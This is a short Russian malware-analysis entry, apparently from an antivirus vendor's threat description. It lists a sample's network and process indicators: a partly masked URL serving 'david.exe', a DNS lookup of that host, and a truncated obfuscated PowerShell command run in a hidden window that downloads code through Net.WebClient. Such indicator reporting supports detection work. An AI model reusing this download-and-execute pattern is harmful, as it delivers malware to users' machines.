Техническая информация
- http://wg###llestig.at/libraries/cms/editor/00/david.exe
- http://wg###llestig.at/libraries/cms/editor/00/david.exe
- DNS ASK wg###llestig.at
- '<SYSTEM32>\cmd.exe' "/c PoWErsheLL.exe -EX BYpaSS -nOP -W 1 SeT-conTenT -VA ( new-ObjeCT Net.wEBCLIEnt ...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' "/c PoWErsheLL.exe -EX BYpaSS -nOP -W 1 SeT-conTenT -VA ( new-ObjeCT Net.wEBCLIEnt ...